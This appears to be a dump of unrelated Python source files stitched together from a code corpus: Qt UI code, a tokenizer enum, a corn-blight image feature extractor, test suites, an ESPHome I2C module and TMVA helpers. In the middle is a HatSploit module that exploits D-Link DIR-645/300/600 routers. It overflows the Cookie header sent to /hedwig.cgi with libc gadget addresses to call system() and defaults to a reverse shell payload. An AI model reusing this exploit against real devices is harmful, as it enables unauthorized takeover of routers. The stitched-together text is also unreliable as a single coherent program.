self.labelanemia.setMaximumSize(QtCore.QSize(16777215, 16777215))
font = QtGui.QFont()
font.setPointSize(10)
self.labelanemia.setFont(font)
self.labelanemia.setStyleSheet("QLabel{background-color:#f6fafd;}")
self.labelanemia.setAlignment(QtCore.Qt.AlignCenter)
self.labelanemia.setObjectName("labelanemia")
self.formLayout.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.labelanemia)
self.label3 = QtWidgets.QLabel(self.groupBox_35)
self.label3.setStyleSheet("QLabel{color:#4683ff;}")
self.label3.setObjectName("label3")
self.formLayout.setWidget(4, QtWidgets.QFormLayout.LabelRole, self.label3)
self.label5 = QtWidgets.QLabel(self.groupBox_35)
self.label5.setStyleSheet("QLabel{color:#4683ff;}")
self.label5.setObjectName("label5")
self.formLayout.setWidget(6, QtWidgets.QFormLayout.LabelRole, self.label5)
self.listarad = QtWidgets.QListWidget(self.groupBox_35)
self.listarad.setMinimumSize(QtCore.QSize(0, 200))
self.listarad.setMaximumSize(QtCore.QSize(16777215, 16777215))
font = QtGui.QFont()
font.setPointSize(10)
self.listarad.setFont(font)
self.listarad.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
self.listarad.setSelectionMode(QtWidgets.QAbstractItemView.NoSelection)
self.listarad.setObjectName("listarad")
self.formLayout.setWidget(6, QtWidgets.QFormLayout.FieldRole, self.listarad)
self.label6 = QtWidgets.QLabel(self.groupBox_35)
self.label6.setStyleSheet("QLabel{color:#4683ff;}")
self.label6.setObjectName("label6")
self.formLayout.setWidget(8, QtWidgets.QFormLayout.LabelRole, self.label6)
self.listdwaa = QtWidgets.QListWidget(self.groupBox_35)
self.listdwaa.setMinimumSize(QtCore.QSize(0, 200))
self.listdwaa.setMaximumSize(QtCore.QSize(16777215, 16777215))
font = QtGui.QFont()
font.setPointSize(10)
self.listdwaa.setFont(font)
self.listdwaa.setStyleSheet("QTableWidget::item:selected{color:#000000;background-color:#ffffff;}")
self.listdwaa.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
self.listdwaa.setSelectionMode(QtWidgets.QAbstractItemView.NoSelection)
self.listdwaa.setObjectName("listdwaa")
self.formLayout.setWidget(8, QtWidgets.QFormLayout.FieldRole, self.listdwaa)
self.line = QtWidgets.QFrame(self.groupBox_35)
self.line.setStyleSheet("QWidget{ border:0px;border-bottom:1px solid #d3e0ea;}")
self.line.setFrameShape(QtWidgets.QFrame.HLine)
self.line.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line.setObjectName("line")
self.formLayout.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.line)
self.line_2 = QtWidgets.QFrame(self.groupBox_35)
self.line_2.setStyleSheet("QWidget{ border:0px;border-bottom:1px solid #d3e0ea;}")
self.line_2.setFrameShape(QtWidgets.QFrame.HLine)
self.line_2.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_2.setObjectName("line_2")
self.formLayout.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.line_2)
self.line_3 = QtWidgets.QFrame(self.groupBox_35)
self.line_3.setStyleSheet("QWidget{ border:0px;border-bottom:1px solid #d3e0ea;}")
self.line_3.setFrameShape(QtWidgets.QFrame.HLine)
self.line_3.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_3.setObjectName("line_3")
self.formLayout.setWidget(5, QtWidgets.QFormLayout.FieldRole, self.line_3)
self.line_4 = QtWidgets.QFrame(self.groupBox_35)
self.line_4.setStyleSheet("QWidget{ border:0px;border-bottom:1px solid #d3e0ea;}")
self.line_4.setFrameShape(QtWidgets.QFrame.HLine)
self.line_4.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_4.setObjectName("line_4")
self.formLayout.setWidget(7, QtWidgets.QFormLayout.FieldRole, self.line_4)
self.labelnotes = QtWidgets.QPlainTextEdit(self.groupBox_35)
self.labelnotes.setEnabled(False)
font = QtGui.QFont()
font.setPointSize(10)
self.labelnotes.setFont(font)
self.labelnotes.setLayoutDirection(QtCore.Qt.LeftToRight)
self.labelnotes.setStyleSheet("QPlainTextEdit{background-color:#f6fafd;border:0px;}")
self.labelnotes.setReadOnly(True)
self.labelnotes.setTextInteractionFlags(QtCore.Qt.TextSelectableByMouse)
self.labelnotes.setCenterOnScroll(False)
self.labelnotes.setObjectName("labelnotes")
self.formLayout.setWidget(4, QtWidgets.QFormLayout.FieldRole, self.labelnotes)
self.verticalLayout_2.addWidget(self.groupBox_35)
self.verticalLayout.addWidget(self.groupBox)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "Form"))
self.label.setText(_translate("Form", "معلومات"))
self.label2.setText(_translate("Form", "أخرى"))
self.labeloth.setText(_translate("Form", "TextLabel"))
self.label7.setText(_translate("Form", "أنيميا"))
self.labelanemia.setText(_translate("Form", "TextLabel"))
self.label3.setText(_translate("Form", "ملاحظات"))
self.label5.setText(_translate("Form", "الأعراض"))
self.label6.setText(_translate("Form", "الدواء"))
| StarcoderdataPython |
3334356 | from __future__ import absolute_import
class TokenType(object):
def __init__(self, name, contains_syntax=False):
self.name = name
self.contains_syntax = contains_syntax
def __repr__(self):
return '%s(%s)' % (self.__class__.__name__, self.name)
class TokenTypes(object):
"""
Basically an enum, but Python 2 doesn't have enums in the standard library.
"""
def __init__(self, names, contains_syntax):
for name in names:
setattr(self, name, TokenType(name, contains_syntax=name in contains_syntax))
PythonTokenTypes = TokenTypes((
'STRING', 'NUMBER', 'NAME', 'ERRORTOKEN', 'NEWLINE', 'INDENT', 'DEDENT',
'ERROR_DEDENT', 'FSTRING_STRING', 'FSTRING_START', 'FSTRING_END', 'OP',
'ENDMARKER'),
contains_syntax=('NAME', 'OP'),
)
| StarcoderdataPython |
28382 | <reponame>sadpotatoes/G6capstone-AI_Education<filename>app/ImagePreprocessing.py
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 8 11:20:09 2020
@author: Donovan
"""
class ImagePreprocessing:
"""@package ImagePreprocessing
This class extracts a number of features from the images and saves them in a CSV
to be used by the machine learning class.
"""
import cv2
#conda install -c conda-forge opencv=3.4.1
#3-Clause BSD License
import os
import csv
import numpy
from skimage.io import imread, imshow
import matplotlib.pyplot as plt
from skimage.color import rgb2hsv
#conda install -c anaconda scikit-image
#BSD 3-Clause
def getAdvancedFeatures(imageIn):
"""
Returns a tuple of advanced features.
Parameters
----------
imageIn : Image
The image to process.
Returns
-------
returnValues : tuple
numbers.
"""
lowRed = 165
highRed = 240
lowGreen = 160
highGreen = 200
lowBlue = 135
highBlue = 240
rgb_img = imageIn
red = rgb_img[:, :, 0]
hsv_img = rgb2hsv(rgb_img)
hue_img = hsv_img[:, :, 0]
sat_img = hsv_img[:, :, 1]
value_img = hsv_img[:, :, 2]
#saturation mask to isolate foreground
satMask = (sat_img > .11) | (value_img > .3)
#hue and value mask to remove additional brown from background
mask = (hue_img > .14) | (value_img > .48)
#healthy corn mask to remove healthy corn, leaving only blighted pixels
nonBlightMask = hue_img < .14
#get foreground
rawForeground = np.zeros_like(rgb_img)
rawForeground[mask] = rgb_img[mask]
#reduce brown in background
foreground = np.zeros_like(rgb_img)
foreground[satMask] = rawForeground[satMask]
#get blighted pixels from foreground
blightedPixels = np.zeros_like(rgb_img)
blightedPixels[nonBlightMask] = foreground[nonBlightMask]
#combine into one band
blightedHSV = np.bitwise_or(blightedPixels[:,:,0], blightedPixels[:,:,1])
blightedHSV = np.bitwise_or(blightedHSV, blightedPixels[:,:,2])
red = rgb_img[:, :, 0]
green = rgb_img[:, :, 1]
blue = rgb_img [:, :, 2]
binary_green = lowGreen < green
binary_blue = lowBlue < blue
binary_red = lowRed < red
RGB_Blights = np.bitwise_and(binary_red, binary_green)
#'brown' pixels within each RGB threshold
RGB_Blights = np.bitwise_and(RGB_Blights, binary_blue)
HSV_and_RGB = np.bitwise_and(RGB_Blights, blightedHSV)
#get features
numForegroundPixels = np.count_nonzero(foreground)
numBlightedHSVPixels = np.count_nonzero(blightedHSV)
blightedHSVRatio = numBlightedHSVPixels / numForegroundPixels
num_RGB_blightedPixels = np.count_nonzero(RGB_Blights)
blightedRGBRatio = num_RGB_blightedPixels / numForegroundPixels
numBlightedBothPixels = np.count_nonzero(HSV_and_RGB)
blightedBothRatio = numBlightedBothPixels / numForegroundPixels
returnValues = (numForegroundPixels, numBlightedHSVPixels, blightedHSVRatio, num_RGB_blightedPixels,
blightedRGBRatio, numBlightedBothPixels, blightedBothRatio)
return returnValues
def avgGray(image):
grayscaleArray = numpy.reshape(image, -1)
gray_mean = numpy.mean(grayscaleArray)
return gray_mean
def avgRed(image):
red = image[0:4000, 0:6000, 0]
red = numpy.reshape(red, -1)
red_mean = numpy.mean(red)
return red_mean
def avgGreen(image):
green = image[0:4000, 0:6000, 1]
green = numpy.reshape(green, -1)
green_mean = numpy.mean(green)
return green_mean
def avgBlue(image):
blue = image [0:4000, 0:6000, 2]
blue = numpy.reshape(blue, -1)
blue_mean = numpy.mean(blue)
return blue_mean
def numBrownRed(image):
red = image[0:4000, 0:6000, 0]
red = numpy.reshape(red, -1)
num_brown_red, bin_edges = numpy.histogram(red, bins=1, range=(180, 250))
return num_brown_red[0]
def numBrownGreen(image):
green = image[0:4000, 0:6000, 1]
green = numpy.reshape(green, -1)
num_brown_green, bin_edges = numpy.histogram(green, bins=1, range=(160, 200))
return num_brown_green[0]
def numBrownBlue(image):
blue = image [0:4000, 0:6000, 2]
blue = numpy.reshape(blue, -1)
num_brown_blue, bin_edges = numpy.histogram(blue, bins=1, range=(150, 240))
return num_brown_blue[0]
def FdHuMoments(image):
"""
Extracts Hu moments feature from an image
Parameters
----------
image : imread
The image used for feature extraction
Returns
-------
Feature : Float Array
The Hu moments in the image.
Reference
---------
https://gogul.dev/software/image-classification-python
"""
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
feature = cv2.HuMoments(cv2.moments(image)).flatten()
return feature
def FdHaralick(image):
import mahotas
#
#MIT License
"""
Extracts Haralick texture feature from an image
Parameters
----------
image : imread
The image used for feature extraction
Returns
-------
Feature : Float Array
The Haralick texture in the image.
Reference
---------
https://gogul.dev/software/image-classification-python
"""
# convert the image to grayscale
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# compute the haralick texture feature vector
haralick = mahotas.features.haralick(gray).mean(axis=0)
# return the result
return haralick
def FdHistogram(image, mask=None, bins = 8):
"""
Extracts color histogram feature from an image
Parameters
----------
image : imread
The image used for feature extraction
Returns
-------
Feature : Float Array
The color histogram in the image.
Reference
---------
https://gogul.dev/software/image-classification-python
"""
# convert the image to HSV color-space
image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
# compute the color histogram
hist = cv2.calcHist([image], [0, 1, 2], None, [bins, bins, bins], [0, 256, 0, 256, 0, 256])
# normalize the histogram
cv2.normalize(hist, hist)
# return the histogram
return hist.flatten()
import numpy as np
def ImageProcessing(folder_name):
def allFilesInDir(dir_name, label):
csvOut = []
counter = 0
for root, dirs, files in os.walk(os.path.abspath(dir_name)):
for file in files:
image = imread(os.path.join(root, file), as_gray=True)
import matplotlib.pyplot as plt
plt.imshow(image, cmap='gray', vmin=0, vmax=1)
plt.show()
gray_mean = avgGray(image)
image = imread(os.path.join(root, file))
red_mean = avgRed(image)
green_mean = avgGreen(image)
blue_mean = avgBlue(image)
num_brown_red = numBrownRed(image)
num_brown_green = numBrownGreen(image)
num_brown_blue = numBrownBlue(image)
advanced_features = getAdvancedFeatures(image)
image = cv2.imread(os.path.join(root, file))
fv_hu_moments = FdHuMoments(image)
fv_haralick = FdHaralick(image)
# fv_histrogram = FdHistogram(image)
feature_vector = np.hstack([file, fv_hu_moments, fv_haralick, gray_mean, red_mean, green_mean, blue_mean,
num_brown_red, num_brown_green, num_brown_blue, advanced_features[0],
advanced_features[1], advanced_features[2], advanced_features[3],
advanced_features[4], advanced_features[5], advanced_features[6], label])
csvOut.append(feature_vector)
counter += 1
print(counter)
return csvOut
#Please update these column labels if you add features in order to help with feature selection.
columnLabels = ('fileName','fvhu','fvhu2','fvhu3','fvhu4','fvhu5','fvhu6','fvhu7',
'fvha1','fvha2','fvha3','fvha4','fvha5','fvha6','fvha7','fvha7',
'fvha8','fvha9','fvha10','fvha11','fvha12',
'gray_mean', 'red_mean', 'green_mean', 'blue_mean', 'num_brown_red', 'num_brown_green',
'num_brown_blue', 'numForegroundPxls', 'blightedHSV_pxls', 'blightedHSV_ratio',
'numRGB_blightedPxls', 'blightedRGBRatio', 'RGB_and_HSV_blighted', 'RGB_and_HSV_both_ratio', 'label')
blighted_features = allFilesInDir('images/blighted', 'B')
healthy_features = allFilesInDir('images/healthy', 'H')
csvfile = open('csvOut.csv','w', newline = '')
obj = csv.writer(csvfile)
obj.writerow(columnLabels)
obj.writerows(blighted_features)
obj.writerows(healthy_features)
#Main
folder_name = 'images/'
ImageProcessing(folder_name) | StarcoderdataPython |
3301215 | <filename>hatsploit/modules/exploit/linux/dlink/hedwig_code_execution.py
#!/usr/bin/env python3
#
# This module requires HatSploit: https://hatsploit.netlify.app
# Current source: https://github.com/EntySec/HatSploit
#
import struct
from hatsploit.lib.module import Module
from hatsploit.utils.handler import Handler
from hatsploit.utils.http import HTTPClient
from hatsploit.utils.string import StringTools
class HatSploitModule(Module, Handler, StringTools, HTTPClient):
details = {
'Name': "D-Link hedwig Remote Code Execution",
'Module': "exploit/linux/dlink/hedwig_code_execution",
'Authors': [
'<NAME> (enty8080) - module developer',
'<NAME> - vulnerability researcher'
],
'Description': "Remote Code Execution in D-Link DIR-645 <= 1.03, DIR-300 <= 2.14, DIR-600.",
'Platform': "linux",
'Rank': "high"
}
payload = {
'Value': "linux/mipsle/shell_reverse_tcp",
'Categories': None,
'Architectures': [
'mipsle',
'mipsbe',
'generic'
],
'Platforms': [
'linux',
'unix'
],
'Types': None
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': 80,
'Type': "port",
'Required': True
}
}
def exploit(self, remote_host, remote_port, command):
command = command.encode("utf-8")
libcbase = 0x2aaf8000
system = 0x000531FF
calcsystem = 0x000158C8
callsystem = 0x000159CC
shellcode = self.random_string(973).encode("utf-8")
shellcode += struct.pack("<I", libcbase + system)
shellcode += self.random_string(16).encode("utf-8")
shellcode += struct.pack("<I", libcbase + callsystem)
shellcode += self.random_string(12).encode("utf-8")
shellcode += struct.pack("<I", libcbase + calcsystem)
shellcode += self.random_string(16).encode("utf-8")
shellcode += command
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"Cookie": b"uid=" + shellcode + b";"
}
data = {
self.random_string(7): self.random_string(7)
}
response = self.http_request(
method="POST",
host=remote_host,
port=remote_port,
path='/hedwig.cgi',
data=data,
headers=headers
)
if response:
return response.text[response.text.find("</hedwig>") + len("</hedwig>"):].strip()
def check(self, remote_host, remote_port):
response = self.http_request(
method="GET",
host=remote_host,
port=remote_port,
path="/hedwig.cgi"
)
if response is None or response.status_code != 200:
self.print_error("Target is not vulnerable!")
return False
return True
def run(self):
remote_host, remote_port = self.parse_options(self.options)
self.print_process(f"Exploiting {remote_host}...")
if not self.check(remote_host, remote_port):
return
self.module_handler(
host=remote_host,
method="echo",
concat="&&",
linemax=5,
sender=self.exploit,
args=[remote_host, remote_port]
)
| StarcoderdataPython |
3325633 | import comics_net.analyzer as analyzer
metadata_path = "./comics_net/resources/metadata.jsonl"
labels_path = "./comics_net/resources/fantastic_four/labels.txt"
def test_load_metadata():
metadata = analyzer.load_metadata(metadata_path)
expected_keys = set(
[
"cover_characters",
"cover_colors",
"cover_first line of dialogue or text",
"cover_genre",
"cover_inks",
"cover_keywords",
"cover_letters",
"cover_pencils",
"covers",
"format_binding",
"format_color",
"format_dimensions",
"format_paper_stock",
"format_publishing_format",
"indexer_notes",
"indicia_frequency",
"issue_brand",
"issue_indicia_publisher",
"issue_pages",
"issue_price",
"on_sale_date",
"rating",
"series_name",
"synopsis",
"title",
"variant_covers",
]
)
assert set(metadata.keys()).difference(expected_keys) == set()
def test_get_issue_number_from_title():
title = "Superman #12"
results = analyzer.get_issue_number_from_title(title)
assert results == 12
def test_match_brackets():
characters = "Batman [Bruce Wayne]"
results = analyzer.match_brackets(characters)
assert results == {"[Bruce Wayne]": {"end": 20, "start": 7}}
characters = "Batman [Bruce Wayne], Superman [Clark Kent]"
results = analyzer.match_brackets(characters)
assert results == {
"[Bruce Wayne]": {"end": 20, "start": 7},
"[Clark Kent]": {"end": 44, "start": 32},
}
def test_replace_semicolons_in_brackets():
test = """Superman [Clark Kent; Kal-El]"""
results = analyzer.replace_semicolons_in_brackets(test)
assert results == """Superman [Clark Kent/ Kal-El]"""
def test_look_behind():
s = "Superman; Batman; Wonder Woman"
results = analyzer.look_behind(s, len(s) + 1)
assert results == "Wonder Woman"
# TODO: write better test examples
def test_convert_character_dict_to_str():
character_dict = {
"Teams": {"Justice League": {"Batman": "Bruce Wayne", "Superman": "<NAME>"}}
}
results = analyzer.convert_character_dict_to_str(character_dict)
assert results == "Justice League: Batman: Bruce Wayne; Superman: Clark Kent"
def test_diff_strings():
s1 = "Hello World!"
s2 = "Hello"
assert analyzer.diff_strings(s2, s1) == " World!"
assert analyzer.diff_strings(s1, s2) == ""
def test_convert_characters_to_list():
s = "Superman [Clark Kent; Kal-El]; Batman [Bruce Wayne]; Wonder Woman [Diana Prince]"
results = analyzer.convert_characters_to_list(s)
assert results == [
"Superman [<NAME>ent/ Kal-El]",
"Batman [Bruce Wayne]",
"Wonder Woman [Diana Prince]",
]
def test_get_random_sample_of_covers():
assert True
def test_create_training_dirs():
assert True
def test_search_row():
issue = "Fantastic Four: Fantastic Four #187 30¢ ()"
actual = analyzer.search_row(file_name=labels_path, string=issue)
expected = 2
assert actual == expected
# # TODO: how to test this method w/ side-effects?
# def test_replace_line():
# issue = "Fantastic Four: Fantastic Four #187 30¢ ()"
# labels = "Human Torch Johnny Storm|The Thing <NAME>|Mr. Fantastic Reed Richards|Invisible Woman Sue Storm Richards"
# analyzer.replace_line(file_name=labels_path, row=2, text="/t".join[issue, labels])
def test_update_label():
issue = "Fantastic Four: Fantastic Four #187 30¢ ()"
label = ["Dr. Doom", "<NAME>"]
image_bunch = "./comics_net/resources/fantastic_four/"
analyzer.update_label(image_bunch=image_bunch, file_name=issue, label=label)
with open(image_bunch + "labels_updated.txt", "r") as f:
for i, row in enumerate(f):
if i == 2:
assert (
row
== "Fantastic Four: Fantastic Four #187 30¢ ()\tDr. Doom|Re<NAME>ards\n"
)
def test_remove_images():
image_bunch = "./comics_net/resources/fantastic_four"
files_to_exclude = [
"She-Hulk: She-Hulk #12 Original ().jpg",
"Marvel Mystery Comics: Marvel Mystery Comics #43 Original (1943-03-22).jpg",
]
analyzer.remove_images(image_bunch, files_to_exclude)
with open(image_bunch + "_updated/labels_updated.txt", "r") as f:
counter = 0
for i, row in enumerate(f):
counter += 1
assert counter == 3
| StarcoderdataPython |
3444589 | import esphome.codegen as cg
import esphome.config_validation as cv
from esphome import pins
from esphome.const import (
CONF_FREQUENCY,
CONF_ID,
CONF_INPUT,
CONF_OUTPUT,
CONF_SCAN,
CONF_SCL,
CONF_SDA,
CONF_ADDRESS,
CONF_I2C_ID,
)
from esphome.core import coroutine_with_priority, CORE
CODEOWNERS = ["@esphome/core"]
i2c_ns = cg.esphome_ns.namespace("i2c")
I2CBus = i2c_ns.class_("I2CBus")
ArduinoI2CBus = i2c_ns.class_("ArduinoI2CBus", I2CBus, cg.Component)
IDFI2CBus = i2c_ns.class_("IDFI2CBus", I2CBus, cg.Component)
I2CDevice = i2c_ns.class_("I2CDevice")
CONF_SDA_PULLUP_ENABLED = "sda_pullup_enabled"
CONF_SCL_PULLUP_ENABLED = "scl_pullup_enabled"
MULTI_CONF = True
def _bus_declare_type(value):
if CORE.using_arduino:
return cv.declare_id(ArduinoI2CBus)(value)
if CORE.using_esp_idf:
return cv.declare_id(IDFI2CBus)(value)
raise NotImplementedError
pin_with_input_and_output_support = cv.All(
pins.internal_gpio_pin_number({CONF_INPUT: True}),
pins.internal_gpio_pin_number({CONF_OUTPUT: True}),
)
CONFIG_SCHEMA = cv.Schema(
{
cv.GenerateID(): _bus_declare_type,
cv.Optional(CONF_SDA, default="SDA"): pin_with_input_and_output_support,
cv.SplitDefault(CONF_SDA_PULLUP_ENABLED, esp32_idf=True): cv.All(
cv.only_with_esp_idf, cv.boolean
),
cv.Optional(CONF_SCL, default="SCL"): pin_with_input_and_output_support,
cv.SplitDefault(CONF_SCL_PULLUP_ENABLED, esp32_idf=True): cv.All(
cv.only_with_esp_idf, cv.boolean
),
cv.Optional(CONF_FREQUENCY, default="50kHz"): cv.All(
cv.frequency, cv.Range(min=0, min_included=False)
),
cv.Optional(CONF_SCAN, default=True): cv.boolean,
}
).extend(cv.COMPONENT_SCHEMA)
@coroutine_with_priority(1.0)
async def to_code(config):
cg.add_global(i2c_ns.using)
var = cg.new_Pvariable(config[CONF_ID])
await cg.register_component(var, config)
cg.add(var.set_sda_pin(config[CONF_SDA]))
if CONF_SDA_PULLUP_ENABLED in config:
cg.add(var.set_sda_pullup_enabled(config[CONF_SDA_PULLUP_ENABLED]))
cg.add(var.set_scl_pin(config[CONF_SCL]))
if CONF_SCL_PULLUP_ENABLED in config:
cg.add(var.set_scl_pullup_enabled(config[CONF_SCL_PULLUP_ENABLED]))
cg.add(var.set_frequency(int(config[CONF_FREQUENCY])))
cg.add(var.set_scan(config[CONF_SCAN]))
if CORE.using_arduino:
cg.add_library("Wire", None)
def i2c_device_schema(default_address):
"""Create a schema for a i2c device.
:param default_address: The default address of the i2c device, can be None to represent
a required option.
:return: The i2c device schema, `extend` this in your config schema.
"""
schema = {
cv.GenerateID(CONF_I2C_ID): cv.use_id(I2CBus),
cv.Optional("multiplexer"): cv.invalid(
"This option has been removed, please see "
"the tca9584a docs for the updated way to use multiplexers"
),
}
if default_address is None:
schema[cv.Required(CONF_ADDRESS)] = cv.i2c_address
else:
schema[cv.Optional(CONF_ADDRESS, default=default_address)] = cv.i2c_address
return cv.Schema(schema)
async def register_i2c_device(var, config):
"""Register an i2c device with the given config.
Sets the i2c bus to use and the i2c address.
This is a coroutine, you need to await it with a 'yield' expression!
"""
parent = await cg.get_variable(config[CONF_I2C_ID])
cg.add(var.set_i2c_bus(parent))
cg.add(var.set_i2c_address(config[CONF_ADDRESS]))
| StarcoderdataPython |
1620668 | import json
import pytest
from sovtoken import TokenTransactions, TOKEN_LEDGER_ID
from sovtoken.request_handlers.write_request_handler.xfer_handler import XferHandler
from sovtoken.request_handlers.write_request_handler.xfer_handler_1_0_0 import XferHandler100
from sovtoken.sovtoken_auth_map import sovtoken_auth_map
from base58 import b58encode_check
from indy.payment import build_payment_req
from indy_node.test.conftest import write_auth_req_validator, constraint_serializer, config_state, idr_cache
from sovtoken.test.helper import libsovtoken_address_to_address
from plenum.common.txn_util import append_txn_metadata
from plenum.test.helper import sdk_json_to_request_object
@pytest.fixture(scope="module")
def xfer_handler(utxo_cache, db_manager, write_auth_req_validator, mint_tokens):
write_auth_req_validator.auth_map.update(sovtoken_auth_map)
return XferHandler(db_manager,
write_req_validator=write_auth_req_validator)
@pytest.fixture(scope="module")
def xfer_handler_1_0_0(utxo_cache, db_manager, write_auth_req_validator, mint_tokens):
write_auth_req_validator.auth_map.update(sovtoken_auth_map)
return XferHandler100(db_manager,
write_req_validator=write_auth_req_validator)
@pytest.fixture(scope="module")
def mint_tokens(payment_address, utxo_cache, db_manager):
addr = libsovtoken_address_to_address(payment_address)
utxo_cache.set(addr, "1:10".encode())
db_manager.get_state(TOKEN_LEDGER_ID).set((addr + ":1").encode(), "10".encode())
@pytest.fixture()
def xfer_request(libsovtoken, payment_address, payment_address_2, wallet, looper):
input = make_utxo(payment_address, 1)
output = payment_address_2
xfer_request_future = build_payment_req(wallet, None, json.dumps([input]),
json.dumps([{"recipient": output, "amount": 10}]), None)
xfer_request, _ = looper.loop.run_until_complete(xfer_request_future)
xfer_request = sdk_json_to_request_object(json.loads(xfer_request))
return xfer_request
@pytest.fixture()
def invalid_amount_xfer_request_insufficient(libsovtoken, payment_address, payment_address_2, wallet, looper):
input = make_utxo(payment_address, 1)
output = payment_address_2
xfer_request_future = build_payment_req(wallet, None, json.dumps([input]),
json.dumps([{"recipient": output, "amount": 11}]), None)
xfer_request, _ = looper.loop.run_until_complete(xfer_request_future)
xfer_request = sdk_json_to_request_object(json.loads(xfer_request))
return xfer_request
@pytest.fixture()
def invalid_amount_xfer_request_excessive(libsovtoken, payment_address, payment_address_2, wallet, looper):
input = make_utxo(payment_address, 1)
output = payment_address_2
xfer_request_future = build_payment_req(wallet, None, json.dumps([input]),
json.dumps([{"recipient": output, "amount": 9}]), None)
xfer_request, _ = looper.loop.run_until_complete(xfer_request_future)
xfer_request = sdk_json_to_request_object(json.loads(xfer_request))
return xfer_request
@pytest.fixture()
def invalid_amount_xfer_request_utxo_does_not_exist(libsovtoken, payment_address, payment_address_2, wallet, looper):
input = make_utxo(payment_address, 2)
output = payment_address_2
xfer_request_future = build_payment_req(wallet, None, json.dumps([input]),
json.dumps([{"recipient": output, "amount": 9}]), None)
xfer_request, _ = looper.loop.run_until_complete(xfer_request_future)
xfer_request = sdk_json_to_request_object(json.loads(xfer_request))
return xfer_request
@pytest.fixture()
def xfer_txn(xfer_handler, xfer_request):
xfer_txn = xfer_handler._req_to_txn(xfer_request)
return append_txn_metadata(xfer_txn, 2, 1, 1)
def make_utxo(addr, seq_no):
txo_inner = json.dumps({"address": addr, "seqNo": seq_no})
return "{}{}".format("txo:sov:", b58encode_check(txo_inner.encode()).decode())
| StarcoderdataPython |
5072085 | <reponame>douglasdavis/root_numpy<gh_stars>10-100
import numpy as np
import ROOT
from ROOT import TMVA
from . import _libtmvanumpy
from .. import ROOT_VERSION
__all__ = [
'add_classification_events',
'add_regression_events',
]
NEW_TMVA_API = ROOT_VERSION >= '6.07/04'
def add_classification_events(obj, events, labels, signal_label=None,
weights=None, test=False):
"""Add classification events to a TMVA::Factory or TMVA::DataLoader from NumPy arrays.
Parameters
----------
obj : TMVA::Factory or TMVA::DataLoader
A TMVA::Factory or TMVA::DataLoader (TMVA's interface as of ROOT
6.07/04) instance with variables already booked in exactly the same
order as the columns in ``events``.
events : numpy array of shape [n_events, n_variables]
A two-dimensional NumPy array containing the rows of events and columns
of variables. The order of the columns must match the order in which
you called ``AddVariable()`` for each variable.
labels : numpy array of shape [n_events]
The class labels (signal or background) corresponding to each event in
``events``.
signal_label : float or int, optional (default=None)
The value in ``labels`` for signal events, if ``labels`` contains only
two classes. If None, the highest value in ``labels`` is used.
weights : numpy array of shape [n_events], optional
Event weights.
test : bool, optional (default=False)
If True, then the events will be added as test events, otherwise they
are added as training events by default.
Notes
-----
* A TMVA::Factory or TMVA::DataLoader requires you to add both training and
test events even if you don't intend to call ``TestAllMethods()``.
* When using MethodCuts, the first event added must be a signal event,
otherwise TMVA will fail with ``<FATAL> Interval : maximum lower than
minimum``. To place a signal event first::
# Get index of first signal event
first_signal = np.nonzero(labels == signal_label)[0][0]
# Swap this with first event
events[0], events[first_signal] = events[first_signal].copy(), events[0].copy()
labels[0], labels[first_signal] = labels[first_signal], labels[0]
weights[0], weights[first_signal] = weights[first_signal], weights[0]
"""
if NEW_TMVA_API: # pragma: no cover
if not isinstance(obj, TMVA.DataLoader):
raise TypeError(
"obj must be a TMVA.DataLoader "
"instance for ROOT >= 6.07/04")
else: # pragma: no cover
if not isinstance(obj, TMVA.Factory):
raise TypeError(
"obj must be a TMVA.Factory instance")
events = np.ascontiguousarray(events, dtype=np.float64)
if events.ndim == 1:
# convert to 2D
events = events[:, np.newaxis]
elif events.ndim != 2:
raise ValueError(
"events must be a two-dimensional array "
"with one event per row")
class_labels, class_idx = np.unique(labels, return_inverse=True)
if class_idx.shape[0] != events.shape[0]:
raise ValueError("numbers of events and labels do not match")
if weights is not None:
weights = np.asarray(weights, dtype=np.float64)
if weights.shape[0] != events.shape[0]:
raise ValueError("numbers of events and weights do not match")
if weights.ndim != 1:
raise ValueError("weights must be one-dimensional")
n_classes = class_labels.shape[0]
if n_classes > 2:
# multiclass classification
_libtmvanumpy.add_events_multiclass(
ROOT.AsCObject(obj), events, class_idx,
weights, test)
elif n_classes == 2:
# binary classification
if signal_label is None:
signal_label = class_labels[1]
signal_label = np.where(class_labels == signal_label)[0][0]
_libtmvanumpy.add_events_twoclass(
ROOT.AsCObject(obj), events, class_idx,
signal_label, weights, test)
else:
raise ValueError("labels must contain at least two classes")
def add_regression_events(obj, events, targets, weights=None, test=False):
"""Add regression events to a TMVA::Factory or TMVA::DataLoader from NumPy arrays.
Parameters
----------
obj : TMVA::Factory or TMVA::DataLoader
A TMVA::Factory or TMVA::DataLoader (TMVA's interface as of ROOT
6.07/04) instance with variables already
booked in exactly the same order as the columns in ``events``.
events : numpy array of shape [n_events, n_variables]
A two-dimensional NumPy array containing the rows of events and columns
of variables. The order of the columns must match the order in which
you called ``AddVariable()`` for each variable.
targets : numpy array of shape [n_events] or [n_events, n_targets]
The target value(s) for each event in ``events``. For multiple target
values, ``targets`` must be a two-dimensional array with a column for
each target in the same order in which you called ``AddTarget()``.
weights : numpy array of shape [n_events], optional
Event weights.
test : bool, optional (default=False)
If True, then the events will be added as test events, otherwise they
are added as training events by default.
Notes
-----
A TMVA::Factory or TMVA::DataLoader requires you to add both training and
test events even if you don't intend to call ``TestAllMethods()``.
"""
if NEW_TMVA_API: # pragma: no cover
if not isinstance(obj, TMVA.DataLoader):
raise TypeError(
"obj must be a TMVA.DataLoader "
"instance for ROOT >= 6.07/04")
